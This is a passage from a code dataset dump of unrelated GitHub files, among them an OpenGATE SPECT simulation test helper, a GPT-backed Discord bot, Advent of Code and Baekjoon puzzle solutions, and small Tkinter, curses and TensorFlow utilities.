waterbox.name\n beam1.particle = \"gamma\"\n beam1.energy.mono = 140.5 * keV\n beam1.position.type = \"sphere\"\n beam1.position.radius = 3 * cm\n beam1.position.translation = [0, 0, 0 * cm]\n beam1.direction.type = \"momentum\"\n beam1.direction.momentum = [0, 0, -1]\n # beam1.direction.type = 'iso'\n beam1.activity = activity / sim.number_of_threads\n\n beam2 = sim.add_source(\"GenericSource\", \"beam2\")\n beam2.mother = waterbox.name\n beam2.particle = \"gamma\"\n beam2.energy.mono = 140.5 * keV\n beam2.position.type = \"sphere\"\n beam2.position.radius = 3 * cm\n beam2.position.translation = [18 * cm, 0, 0]\n beam2.direction.type = \"momentum\"\n beam2.direction.momentum = [0, 0, -1]\n # beam2.direction.type = 'iso'\n beam2.activity = activity / sim.number_of_threads\n\n beam3 = sim.add_source(\"GenericSource\", \"beam3\")\n beam3.mother = waterbox.name\n beam3.particle = \"gamma\"\n beam3.energy.mono = 140.5 * keV\n beam3.position.type = \"sphere\"\n beam3.position.radius = 1 * cm\n beam3.position.translation = [0, 10 * cm, 0]\n beam3.direction.type = \"momentum\"\n beam3.direction.momentum = [0, 0, -1]\n # beam3.direction.type = 'iso'\n beam3.activity = activity / sim.number_of_threads\n\n # add stat actor\n stats_actor = sim.add_actor(\"SimulationStatisticsActor\", \"Stats\")\n stats_actor.track_types_flag = True\n\n # hits collection\n hc = sim.add_actor(\"DigitizerHitsCollectionActor\", \"Hits\")\n # get crystal volume by looking for the word crystal in the name\n for k, v in sim.volume_manager.volumes.items():\n if \"crystal\" in k:\n crystal = v\n hc.mother = crystal.name\n print(\"Crystal :\", crystal.name)\n hc.output = paths.output / \"test028.root\"\n hc.attributes = [\n \"PostPosition\",\n \"TotalEnergyDeposit\",\n \"TrackVolumeCopyNo\",\n \"PostStepUniqueVolumeID\",\n \"PreStepUniqueVolumeID\",\n \"GlobalTime\",\n \"KineticEnergy\",\n \"ProcessDefinedStep\",\n ]\n\n # singles collection\n sc = sim.add_actor(\"DigitizerAdderActor\", \"Singles\")\n sc.mother = crystal.name\n sc.input_digi_collection = \"Hits\"\n sc.policy = \"EnergyWinnerPosition\"\n # sc.policy = 'EnergyWeightedCentroidPosition'\n sc.skip_attributes = [\"KineticEnergy\", \"ProcessDefinedStep\", \"KineticEnergy\"]\n sc.output = hc.output\n\n # EnergyWindows\n cc = sim.add_actor(\"DigitizerEnergyWindowsActor\", \"EnergyWindows\")\n cc.mother = crystal.name\n cc.input_digi_collection = \"Singles\"\n cc.channels = [\n {\"name\": \"scatter\", \"min\": 114 * keV, \"max\": 126 * keV},\n {\"name\": \"peak140\", \"min\": 126 * keV, \"max\": 154.55 * keV},\n {\n \"name\": \"spectrum\",\n \"min\": 0 * keV,\n \"max\": 5000 * keV,\n }, # should be strictly equal to 'Singles'\n ]\n cc.output = hc.output\n\n \"\"\"\n The order of the actors is important !\n 1. Hits\n 2. Singles\n 3. EnergyWindows\n \"\"\"\n\n # sec = gate.g4_units('second')\n # sim.run_timing_intervals = [[0, 0.5 * sec], [0.5 * sec, 1 * sec]]\n\n # user hook function\n sim.user_fct_after_init = check_production_cuts\n\n return spect\n\n\ndef test_add_proj(sim, paths):\n mm = gate.g4_units.mm\n for k, v in sim.volume_manager.volumes.items():\n if \"crystal\" in k:\n crystal = v\n # 2D binning projection\n proj = sim.add_actor(\"DigitizerProjectionActor\", \"Projection\")\n proj.mother = crystal.name\n # we set two times the spectrum channel to compare with Gate output\n proj.input_digi_collections = [\"spectrum\", \"scatter\", \"peak140\", \"spectrum\"]\n proj.spacing = [4.41806 * mm, 4.41806 * mm]\n proj.size = [128, 128]\n # proj.plane = 'XY' # not implemented yet # FIXME\n proj.output = paths.output / \"proj028.mhd\"\n # by default, the origin of the images are centered\n # set to False here to keep compatible with previous version\n proj.origin_as_image_center = False\n return proj\n\n\ndef test_spect_hits(output, paths, version=\"2\"):\n # stat\n gate.exception.warning(\"Compare stats\")\n stats = output.get_actor(\"Stats\")\n print(stats)\n print(f\"Number of runs was {stats.counts.run_count}. Set to 1 before comparison\")\n stats.counts.run_count = 1 # force to 1\n stats_ref = utility.read_stat_file(paths.gate_output / f\"stat{version}.txt\")\n is_ok = utility.assert_stats(stats, stats_ref, tolerance=0.07)\n\n # Compare root files\n print()\n gate.exception.warning(\"Compare hits\")\n gate_file = paths.gate_output / f\"hits{version}.root\"\n hc_file = output.get_actor(\"Hits\").user_info.output\n print(hc_file)\n checked_keys = [\n {\"k1\": \"posX\", \"k2\": \"PostPosition_X\", \"tol\": 1.7, \"scaling\": 1},\n {\"k1\": \"posY\", \"k2\": \"PostPosition_Y\", \"tol\": 1.3, \"scaling\": 1},\n {\"k1\": \"posZ\", \"k2\": \"PostPosition_Z\", \"tol\": 0.9, \"scaling\": 1},\n {\"k1\": \"edep\", \"k2\": \"TotalEnergyDeposit\", \"tol\": 0.001, \"scaling\": 1},\n {\"k1\": \"time\", \"k2\": \"GlobalTime\", \"tol\": 0.01, \"scaling\": 1e-9},\n ]\n is_ok = (\n utility.compare_root2(\n gate_file,\n hc_file,\n \"Hits\",\n \"Hits\",\n checked_keys,\n paths.output / f\"test028_{version}_hits.png\",\n n_tol=4,\n )\n and is_ok\n )\n\n # Compare root files\n print()\n gate.exception.warning(\"Compare singles\")\n gate_file = paths.gate_output / f\"hits{version}.root\"\n hc_file = output.get_actor(\"Singles\").user_info.output\n checked_keys = [\n {\"k1\": \"globalPosX\", \"k2\": \"PostPosition_X\", \"tol\": 1.8, \"scaling\": 1},\n {\"k1\": \"globalPosY\", \"k2\": \"PostPosition_Y\", \"tol\": 1.3, \"scaling\": 1},\n {\"k1\": \"globalPosZ\", \"k2\": \"PostPosition_Z\", \"tol\": 0.2, \"scaling\": 1},\n {\"k1\": \"energy\", \"k2\": \"TotalEnergyDeposit\", \"tol\": 0.001, \"scaling\": 1},\n ]\n is_ok = (\n utility.compare_root2(\n gate_file,\n hc_file,\n \"Singles\",\n \"Singles\",\n checked_keys,\n paths.output / f\"test028_{version}_singles.png\",\n )\n and is_ok\n )\n\n # Compare root files\n print()\n gate.exception.warning(\"Compare singles and spectrum (must be strictly equal)\")\n ref_file = output.get_actor(\"Singles\").user_info.output\n hc_file = output.get_actor(\"EnergyWindows\").user_info.output\n checked_keys = [\n {\"k1\": \"PostPosition_X\", \"k2\": \"PostPosition_X\", \"tol\": 0.001, \"scaling\": 1},\n {\"k1\": \"PostPosition_Y\", \"k2\": \"PostPosition_Y\", \"tol\": 0.001, \"scaling\": 1},\n {\"k1\": \"PostPosition_Z\", \"k2\": \"PostPosition_Z\", \"tol\": 0.001, \"scaling\": 1},\n {\n \"k1\": \"TotalEnergyDeposit\",\n \"k2\": \"TotalEnergyDeposit\",\n \"tol\": 0.001,\n \"scaling\": 1,\n },\n ]\n is_ok = (\n utility.compare_root2(\n ref_file,\n hc_file,\n \"Singles\",\n \"spectrum\",\n checked_keys,\n paths.output / f\"test028_{version}_spectrum.png\",\n n_tol=0.01,\n )\n and is_ok\n )\n\n # Compare root files\n print()\n gate.exception.warning(\"Compare scatter\")\n hc_file = output.get_actor(\"EnergyWindows\").user_info.output\n checked_keys = [\n {\"k1\": \"globalPosX\", \"k2\": \"PostPosition_X\", \"tol\": 20, \"scaling\": 1},\n {\"k1\": \"globalPosY\", \"k2\": \"PostPosition_Y\", \"tol\": 15, \"scaling\": 1},\n {\"k1\": \"globalPosZ\", \"k2\": \"PostPosition_Z\", \"tol\": 1.8, \"scaling\": 1},\n {\"k1\": \"energy\", \"k2\": \"TotalEnergyDeposit\", \"tol\": 0.2, \"scaling\": 1},\n ]\n is_ok = (\n utility.compare_root2(\n gate_file,\n hc_file,\n \"scatter\",\n \"scatter\",\n checked_keys,\n paths.output / f\"test028_{version}_scatter.png\",\n n_tol=15,\n )\n and is_ok\n )\n\n # Compare root files\n print()\n gate.exception.warning(\"Compare peak\")\n hc_file = output.get_actor(\"EnergyWindows\").user_info.output\n checked_keys = [\n {\"k1\": \"globalPosX\", \"k2\": \"PostPosition_X\", \"tol\": 1.7, \"scaling\": 1},\n {\"k1\": \"globalPosY\", \"k2\": \"PostPosition_Y\", \"tol\": 1, \"scaling\": 1},\n {\"k1\": \"globalPosZ\", \"k2\": \"PostPosition_Z\", \"tol\": 0.21, \"scaling\": 1},\n {\"k1\": \"energy\", \"k2\": \"TotalEnergyDeposit\", \"tol\": 0.1, \"scaling\": 1},\n ]\n is_ok = (\n utility.compare_root2(\n gate_file,\n hc_file,\n \"peak140\",\n \"peak140\",\n checked_keys,\n paths.output / f\"test028_{version}_peak.png\",\n n_tol=2.1,\n )\n and is_ok\n )\n\n return is_ok\n\n\ndef test_spect_proj(output, paths, proj, version=\"3\"):\n print()\n stats = output.get_actor(\"Stats\")\n stats.counts.run_count = 1 # force to 1 to compare with gate result\n print(stats)\n stats_ref = utility.read_stat_file(paths.gate_output / f\"stat{version}.txt\")\n is_ok = utility.assert_stats(stats, stats_ref, 0.025)\n\n # compare images with Gate\n print()\n print(\"Compare images (old spacing/origin)\")\n # read image and force change the offset to be similar to old Gate\n img = itk.imread(str(paths.output / \"proj028.mhd\"))\n spacing = np.array(proj.user_info.spacing)\n origin = spacing / 2.0\n origin[2] = 0.5\n spacing[2] = 1\n img.SetSpacing(spacing)\n img.SetOrigin(origin)\n itk.imwrite(img, str(paths.output / \"proj028_offset.mhd\"))\n is_ok = (\n utility.assert_images(\n paths.gate_output / f\"projection{version}.mhd\",\n paths.output / \"proj028_offset.mhd\",\n stats,\n tolerance=16,\n ignore_value=0,\n axis=\"y\",\n sum_tolerance=1.6,\n fig_name=paths.output / f\"proj028_{version}_offset.png\",\n )\n and is_ok\n )\n\n # compare images with Gate\n if version == \"3_blur\":\n return is_ok\n print()\n print(\"Compare images (new spacing/origin\")\n # read image and force change the offset to be similar to old Gate\n is_ok = (\n utility.assert_images(\n paths.output_ref / \"proj028_ref.mhd\",\n paths.output / \"proj028.mhd\",\n stats,\n tolerance=14,\n ignore_value=0,\n axis=\"y\",\n sum_tolerance=1.5,\n fig_name=paths.output / f\"proj028_{version}_no_offset.png\",\n )\n and is_ok\n )\n\n return is_ok\n","repo_name":"OpenGATE/opengate","sub_path":"opengate/tests/src/test028_ge_nm670_spect_2_helpers.py","file_name":"test028_ge_nm670_spect_2_helpers.py","file_ext":"py","file_size_in_byte":12475,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"3"} +{"seq_id":"8424938071","text":"class Configuration:\n \"\"\"\n These flags can be used to change the giveme5w configuration\n \"\"\"\n __config = {\n \"candidate\": {\n \"text\": True, # Concatenated 'originalText' from nlpToken\n \"nlpIndexSentence\": True, # determined by CoreNlp: include index of sentence\n \"parts\": {\n \"nlpToken\": True # determined by CoreNlp: Tag\n },\n \"score\": True # determined by Giveme5W: calculated score for this candidate\n },\n \"label\": True, # This repeating information is useful for template engines\n \"onlyTopCandidate\": False, # Return only the Candidate with the best score per question\n \"Giveme5W-runtime-resources\": './runtime-resources/', # Runtime directory\n \"fiveWoneH_enhancer_full\": True # include the entire enhancer data\n }\n\n @classmethod\n def get(cls):\n return cls.__config;\n","repo_name":"fhamborg/Giveme5W1H","sub_path":"Giveme5W1H/extractor/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":485,"dataset":"github-code","pt":"3"} +{"seq_id":"71505090642","text":"\"\"\"\nTest file for Polygon annotation tool : customizable tool kit for annotating\npolygons on the screen (given image or any canvas), along with\nfeature to store, annotate and load them\nAuthor: Abhishek Roushan abhishek.roushan12@gmail.com\n\"\"\"\n\nfrom polygonAnnotation import *\n\n\ndef testPolygonsWrite(polys=[]):\n txtFileName = \"./data.txt\"\n writer = TextWriter(txtFileName)\n polygons = [Polygon([Point2d(0,0), Point2d(1,0), Point2d(0,1)]),\n Polygon([Point2d(-3.4,5), Point2d(5,7), Point2d(6.7,2.1), Point2d(4.33, 5.1)])]\n writePoly = polygons if len(polys)==0 else polys\n writer.writePolygonsToFile(polygons)\n\n\n# testPolygonsWrite()\n\ndef testCanvas():\n c = Canvas()\n c.create()\n\ntestCanvas()\n\n\n","repo_name":"abhishekroushan/polygonAnnotationTool","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12807604357","text":"import discord\nimport os\nimport requests\nimport re\nimport logging\n\nfrom googlesearch import search\n\nfrom .gpt import *\n\nlogging.basicConfig(level=logging.INFO, format=\"[%(levelname)s] %(name)s :: %(message)s\")\nlog = logging.getLogger()\ndiscord_logger = logging.getLogger('discord')\ndiscord_logger.setLevel(logging.ERROR)\n\nHELP_MSG = \"\"\"\nHello there! I'm Dilbot, and I'm just here to help you suffer through your workday. :sun_with_face:\n\n**How to use me:**\n\nAll commands start with pinging me (noted by `` below):\n```\n image of {prompt} | Generate image with DALL-E\n xkcd {prompt} | Search for an XKCD by that prompt\n {anything else} | Run the text in OpenAI GPT 3.5\n```\n\nIf DALL-E or GPT functions would return an error, or if you butt up against the\nGPT content moderation rules, I will simply reply with\n> :warning: Can't do that sorry\nGPT can be...wordy with those responses. Nobody needs that.\n\nAdditionally, GPT functionality is setup to only respond in **100 words or less!**\n_This is to save Max money. Shit's expensive, yo._\n\n_Please note that DALL-E and GPT 3.5 commands cost Max money! Be nice.\n**I keep track of usage, and will send you an invoice if you misbehave**_ :smiling_imp:\n\"\"\"\nBOT_ROLE = '1086130719849463822'\n\n\nclass ChatClient(discord.Client):\n message: list[str] = []\n\n async def on_ready(self):\n log.info(f\"{self.user} has connected to Discord\")\n\n async def on_message(self, message: discord.Message):\n # Ignore own messages\n if message.author == self.user:\n return\n log.info(f\"Message seen: {message.content}\\n From: {message.author}\")\n # Matches both pinging the bot and the role, just in case\n ping_regex = re.compile(f'^<@&?(?:{self.user.id}|{BOT_ROLE})> (.*)')\n result = ping_regex.findall(message.content)\n # Bot was pinged\n if result:\n log.info(\"Parsing as ping to Dilbot\")\n prompt = result[0]\n if \"help\" == prompt.lower():\n resp = HELP_MSG\n elif \"image of \" == prompt[0:9]:\n log.info(\"Paging DALL-E\")\n resp = gpt_image(prompt[9:])\n elif prompt.startswith(\"xkcd \"):\n log.info(\"XKCD lookup\")\n result = search(prompt, tld='com', num=1, stop=1)\n try:\n link = next(result)\n log.info(f\"Link: {link}\")\n resp = f\":link: {link}\"\n except StopIteration:\n log.warning(f\"Couldn't find an XKCD result for '{prompt}'\")\n resp = f\":warning: No results, sorry\"\n else:\n log.info(\"Paging ChatGPT\")\n resp = gpt_parse(prompt)\n await message.reply(resp)\n return\n\n\ndef main():\n token = os.getenv(\"DISCORD_TOKEN\")\n openai.organization = os.getenv(\"GPT_ORG\")\n openai.api_key = os.getenv(\"GPT_TOKEN\")\n if not token or not openai.api_key or not openai.organization:\n log.fatal(\n f\"ERROR: MISSING ONE OF THE REQUIRED ENV VARIABLES:\\n\"\n \" - DISCORD_TOKEN\\n\"\n \" - GPT_TOKEN\\n\"\n \" - GPT_ORG\"\n )\n exit(1)\n client = ChatClient()\n client.run(token)\n","repo_name":"3digitdev/dilbot","sub_path":"src/dilbot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32334642543","text":"from child_sum_tree import ChildSumTree\nimport make_tree\n\n\nif __name__ == \"__main__\":\n tree_model = ChildSumTree()\n tree = make_tree.make_data_tree()\n traversal = tree_model._traversal_tree(tree)\n result = tree_model.compute_tree(tree)\n\n print ('tree 1')\n print ('traversal = ',traversal)\n print ('result = ',result)\n\n tree2 = make_tree.make_data_tree2()\n traversal2 = tree_model._traversal_tree(tree2)\n result2 = tree_model.compute_tree(tree2)\n print ('tree 2')\n print ('traversal 2 = ', traversal2)\n print ('result 2 = ', result2)\n\n","repo_name":"ttpro1995/ChildSumTree","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32748705","text":"# 포도주 시식\n\"\"\"\ndynamic programming\nn >= 3 부터는 n번째 숫자가 첫 번째가 되는지 두 번째가 되는지 세 번째가 되는지 경우의 수로 나누어서 확인\nif n >= 3:\n # n번째 숫자가 첫 번째인 경우, 두 번째인 경우, 세 번째인 경우\n dp[n] = max(data[n] + dp[n-2], data[n] + data[n-1] + dp[n-3], dp[i-1])\n\"\"\"\nimport sys\n\nsys.stdin = open('C:\\github\\Algorithm\\Dynamic-Programming\\input.txt', 'rt')\n\nn = int(input())\ndata = [0] # 인덱스 1부터 시작\nfor _ in range(n):\n data.append(int(input()))\n\ndp = [0] * (n+1)\ndp[1] = data[1]\nif n >= 2:\n dp[2] = data[1] + data[2]\n\n for i in range(3, n+1):\n case_1 = data[i] + dp[i-2]\n case_2 = data[i] + data[i-1] + dp[i-3]\n case_3 = dp[i-1]\n dp[i] = max(case_1, case_2, case_3)\n\nprint(max(dp))\n","repo_name":"limgeonho/Algorithm-1","sub_path":"BOJ/Dynamic-Programming/[BOJ]2156.py","file_name":"[BOJ]2156.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37915604533","text":"\"\"\"AoC 8, 2021\"\"\"\n\n# Standard library imports\nimport pathlib\nimport sys\nfrom aocd import data, submit\nfrom dataclasses import dataclass\nfrom collections import defaultdict\n\n\n@dataclass\nclass DigitDisplay:\n \"\"\"Class to represent a digital display.\n\n 0: 1: 2: 3: 4:\n aaaa .... aaaa aaaa ....\n b c . c . c . c b c\n b c . c . c . c b c\n .... .... dddd dddd dddd\n e f . f e . . f . f\n e f . f e . . f . f\n gggg .... gggg gggg ....\n\n 5: 6: 7: 8: 9:\n aaaa aaaa aaaa aaaa aaaa\n b . b . . c b c b c\n b . b . . c b c b c\n dddd dddd .... dddd dddd\n . f e f . f e f . f\n . f e f . f e f . f\n gggg gggg .... gggg gggg\n \"\"\"\n\n digits: dict\n\n def __init__(self):\n self.digits = {}\n\n def add_digit(self, segments: str) -> None:\n sorted_segment = str(sorted(segments))\n if len(segments) == 2:\n self.digits[1] = set(segments)\n self.digits[sorted_segment] = 1\n elif len(segments) == 3:\n self.digits[7] = set(segments)\n self.digits[sorted_segment] = 7\n elif len(segments) == 4:\n self.digits[4] = set(segments)\n self.digits[sorted_segment] = 4\n elif len(segments) == 7:\n self.digits[8] = set(segments)\n self.digits[sorted_segment] = 8\n\n def decode_segment(self, segments: set) -> int:\n \"\"\"Decode segment.\"\"\"\n all_segments = self.digits[8]\n unknown_segments = set(segments)\n extra_segments = all_segments - unknown_segments\n ret = None\n if len(extra_segments) == 1: # either a 0/6/9\n if len(extra_segments - self.digits[4]) == 1: # must be a 9\n ret = 9\n elif len(extra_segments - self.digits[1]) == 0: # must be a 6\n ret = 6\n else: # must be a 0\n ret = 0\n elif len(extra_segments) == 2: # either a 2/3/5\n if len(extra_segments - self.digits[1]) == 2: # must be a 3\n ret = 3\n elif len(extra_segments - self.digits[4]) == 1: # must be a 5\n ret = 5\n else:\n ret = 2\n return ret\n\n def convert_digit(self, segments: str) -> int:\n sorted_segment = str(sorted(segments))\n if sorted_segment in self.digits:\n return self.digits[sorted_segment]\n else:\n digit = self.decode_segment(set(segments))\n self.digits[sorted_segment] = digit\n self.digits[digit] = set(segments)\n return digit\n\n\ndef parse(puzzle_input):\n \"\"\"Parse input\"\"\"\n output = []\n # This could be a list comprehension but :shrug:\n for entry in puzzle_input.splitlines():\n signal_pattern, output_value = entry.split(\"|\")\n signal_pattern = signal_pattern.strip().split(\" \")\n output_value = output_value.strip().split(\" \")\n output.append((signal_pattern, output_value))\n return output\n\n\ndef part1(data):\n \"\"\"Solve part 1.\n Because the digits 1, 4, 7, and 8 each use a unique number of segments, you should be able to tell which\n combinations of signals correspond to those digits. Counting only digits in the output values (the part after | on\n each line), in the above example, there are 26 instances of digits that use a unique number of segments (highlighted\n above).\n \"\"\"\n total_unique_digits = 0\n for entry in data:\n signal_pattern, output_value = entry\n for digit in output_value:\n if len(digit) in (2, 3, 4, 7):\n total_unique_digits += 1\n return total_unique_digits\n\n\ndef part2(data):\n \"\"\"Solve part 2\"\"\"\n total_digits = 0\n for entry in data:\n signal_pattern, output_value = entry\n decoder = DigitDisplay()\n for digit in signal_pattern:\n if len(digit) in (2, 3, 4, 7):\n decoder.add_digit(digit)\n for digit in output_value:\n if len(digit) in (2, 3, 4, 7):\n decoder.add_digit(digit)\n decoder_digits = \"\"\n for digit in output_value:\n decoder_digits += str(decoder.convert_digit(digit))\n total_digits += int(decoder_digits)\n return total_digits\n\n\ndef solve(puzzle_input):\n \"\"\"Solve the puzzle for the given input\"\"\"\n data = parse(puzzle_input)\n solution1 = part1(data)\n solution2 = part2(data)\n\n return solution1, solution2\n\n\nif __name__ == \"__main__\":\n answer_a, answer_b = solve(puzzle_input=data)\n if answer_a:\n submit(answer_a, part=\"a\")\n if answer_b:\n submit(answer_b, part=\"b\")\n","repo_name":"jokajak/advent_of_code","sub_path":"2021/08/aoc202108.py","file_name":"aoc202108.py","file_ext":"py","file_size_in_byte":4842,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"17513315585","text":"import sys\nimport curses\nfrom curses.textpad import rectangle\n\nclass Board(object):\n def __init__(self, stdscr):\n self.stdscr = stdscr\n self.Y, self.X = self.stdscr.getmaxyx()\n self.Y = self.Y - 1\n self.X = self.X - 1\n\n def show(self, state):\n cell_len = len(state)\n cell_Y = self.Y // cell_len\n cell_X = self.X // cell_len\n for i in range(cell_len):\n uly, lry = i * cell_Y, (i + 1) * cell_Y\n for j in range(cell_len):\n ulx, lrx = j * cell_X, (j + 1) * cell_X\n rectangle(self.stdscr, uly, ulx, lry, lrx)\n str_cell = str(state[i][j])\n ty = (uly + lry) // 2\n tx = (ulx + lrx - len(str_cell)) // 2 + 1\n self.stdscr.addstr(ty, tx, str_cell)\n self.stdscr.refresh()\n","repo_name":"chengui/python-samples","sub_path":"term-2048/tui2048/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15914123956","text":"import torch.nn as nn\nfrom torch.nn.modules.dropout import _DropoutNd\n\n\ndef _set_dropout_to_train_mode(m: nn.Module) -> None:\n if isinstance(m, _DropoutNd):\n m.train()\n\n\ndef set_model_to_mode(classifier: nn.Module, mode: str) -> None:\n if mode == \"train\":\n classifier.train()\n elif mode == \"eval\":\n classifier.eval()\n # Only set dropout to training mode (for test time dropout)\n if getattr(classifier, \"mc_dropout\", 0.0) > 0:\n classifier.apply(_set_dropout_to_train_mode)\n else:\n raise ValueError(f\"Unknown mode '{mode}'\")\n","repo_name":"RonMcKay/UQGAN","sub_path":"cls_models/cls_utils.py","file_name":"cls_utils.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"74631130320","text":"# Tkinter Calculator Program\n# 03/02/2021\n\nfrom tkinter import *\n\nwindow = Tk()\n\nwindow.title(\"Curtis' Calculator\")\n\nwindow.geometry('250x100')\n\nlbl1 = Label(window, text=\"Number 1\")\nlbl1.grid(column=0, row=0)\n\nlbl2 = Label(window, text=\"Number 2\")\nlbl2.grid(column=0, row=1)\n\nnum1 = Entry(window,width=10)\nnum1.grid(column=1, row=0)\n\nnum2 = Entry(window,width=10)\nnum2.grid(column=1, row=1)\n\ndef clicked():\n answer = Label(window, text=\"Answer: \" + str(int(num1.get()) + int(num2.get())))\n answer.grid(column=0, row=3)\n\nbtn = Button(window, text=\"Add Numbers\", command=clicked)\nbtn.grid(column=2, row=0)\n\nwindow.mainloop()","repo_name":"Curtis73/ALevel-ComputerScience","sub_path":"Tkinter Calculator.py","file_name":"Tkinter Calculator.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38050760805","text":"\nimport cv2 as cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom PIL import Image\nfrom tensorflow.keras.preprocessing import image\nimport tensorflow as tf\nfrom tkinter import *\nimport tkinter as tk\nimport win32gui\nfrom PIL import ImageGrab, Image\n\n\n\n\n\n#load the model\nmodel = tf.keras.models.load_model('model') \n\n\ndef processs(img):\n images=[]\n cv2.imwrite('5.png',np.float32(img)) #SAVE THE IMAGE\n col = Image.open('5.png') # READ THE IMAGE\n gray = col.convert('L') #CONVERT THE IMAGE\n bw = gray.point(lambda x: 0 if x<100 else 255, '1')\n bw.save('5.png')\n\n img = cv2.imread('5.png',cv2.IMREAD_GRAYSCALE) #READ THE IMAGE \n img = cv2.bitwise_not(img)\n img_size = 28\n img = cv2.resize(img, (img_size,img_size))\n finalIMAGE = tf.keras.utils.normalize(img, axis = 1)\n images.append(finalIMAGE)\n npa = np.asarray(images, dtype=np.float32)\n npa = npa.reshape(npa.shape[0], 28, 28, 1)\n predictions = model.predict(npa)\n print(np.argmax(predictions[0]))\n print(predictions[0])\n return np.argmax(predictions[0]),max (predictions)\n\n\n\n\nclass App(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n self.x = self.y = 0\n # Creating elements\n self.canvas = tk.Canvas(self, width=200, height=200, bg = \"white\", cursor=\"cross\")\n self.label = tk.Label(self, text=\"Thinking..\", font=(\"Helvetica\", 48))\n self.classify_btn = tk.Button(self, text = \"Recognize\", command = self.classify_handwriting) \n self.button_clear = tk.Button(self, text = \"Clear\", command = self.clear_all)\n # Grid structure\n self.canvas.grid(row=0, column=0, pady=2, sticky=W, )\n self.label.grid(row=0, column=1,pady=2, padx=2)\n self.classify_btn.grid(row=1, column=1, pady=2, padx=2)\n self.button_clear.grid(row=1, column=0, pady=2)\n #self.canvas.bind(\"\", self.start_pos)\n self.canvas.bind(\"\", self.draw_lines)\n def clear_all(self):\n self.canvas.delete(\"all\")\n def classify_handwriting(self):\n HWND = self.canvas.winfo_id() # get the handle of the canvas\n rect = win32gui.GetWindowRect(HWND) # get the coordinate of the canvas\n im = ImageGrab.grab(rect)\n digit, acc = processs(im)\n\n self.label.configure(text= str(digit))\n def draw_lines(self, event):\n self.x = event.x\n self.y = event.y\n r=15\n self.canvas.create_oval(self.x-r, self.y-r, self.x + r, self.y + r, fill='black',width=0)\napp = App()\nmainloop()\n\n\n\n \n\n \n\n\n\n","repo_name":"abdulrahmanRAIES/Handwritten-Digit-Recognition-using-python-CNN","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"18828650350","text":"import tensorflow as tf\n\n\ndef random_binary_mask(tensor_shape, false_percentage, strict=True):\n if not strict:\n binary_mask = tf.random.uniform(tensor_shape) > false_percentage\n else:\n binary_mask = tf.reshape(\n tf.random.shuffle(tf.linspace(0.0, 1.0, tf.reduce_prod(tensor_shape)))\n > false_percentage,\n tensor_shape,\n )\n return binary_mask\n\n\ndef kwinner_mask(inputs, k):\n vals, _ = tf.math.top_k(inputs, k=k)\n kth_elems = tf.reduce_min(vals, axis=-1, keepdims=True)\n boolean_mask = tf.greater_equal(inputs, kth_elems)\n return boolean_mask\n\n\ndef flat_kwinner_mask(inputs, k):\n if len(inputs.shape) > 2:\n input_shape_batchless = inputs.shape[1:].as_list()\n flat_input = tf.reshape(inputs, (-1, tf.reduce_prod(input_shape_batchless)))\n boolean_mask = kwinner_mask(flat_input, k)\n return tf.reshape(boolean_mask, (-1, *input_shape_batchless))\n else:\n return kwinner_mask(inputs, k)\n\n\ndef add_noise(img, eta, strict=True):\n noise_val = tf.reduce_mean(img) + 2 * tf.math.reduce_std(img)\n binary_mask = random_binary_mask(img.shape, eta, strict)\n return tf.where(binary_mask, img, noise_val)\n","repo_name":"water-vapor/how-can-we-be-so-dense-tensorflow","sub_path":"ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"71955992403","text":"import os, cv2, time\nimport queue\nimport sys\nfrom multiprocessing import Process, Queue\nimport numpy as np\nimport pygame\nfrom tools import video_writer, send_surface, receive_surface\n\n## Define keyboard Macros as sets\nTEAM1_PLAYER1_HIT = {'w'}\nTEAM1_PLAYER1_SINK = {'e'}\nTEAM1_PLAYER1_MISS = {'r'}\nTEAM1_PLAYER1_DROP = {'t'}\n\nTEAM1_PLAYER2_HIT = {'z'}\nTEAM1_PLAYER2_SINK = {'x'}\nTEAM1_PLAYER2_MISS = {'c'}\nTEAM1_PLAYER2_DROP = {'v'}\n\nTEAM2_PLAYER1_HIT = {'u'}\nTEAM2_PLAYER1_SINK = {'i'}\nTEAM2_PLAYER1_MISS = {'o'}\nTEAM2_PLAYER1_DROP = {'p'}\n\nTEAM2_PLAYER2_HIT = {'n'}\nTEAM2_PLAYER2_SINK = {'m'}\nTEAM2_PLAYER2_MISS = {','}\nTEAM2_PLAYER2_DROP = {'.'}\n\nREPLAY ={'s'}\nBACKSPACE_KEY = ord('\\x08') # or simply 8\nBACKSPACE_KEY_MAC = 127\n\nQuit = {'escape'}\n\n\nandrew_url = \"http://admin:4647@andrew.local:8081/video\"\n\nclass SnappaWindow:\n def __init__(self, stream_url=None, team_info=None, debug=False):\n # All your initialization code...\n self.stream_url = stream_url\n\n # Initialize the camera\n self.cap = 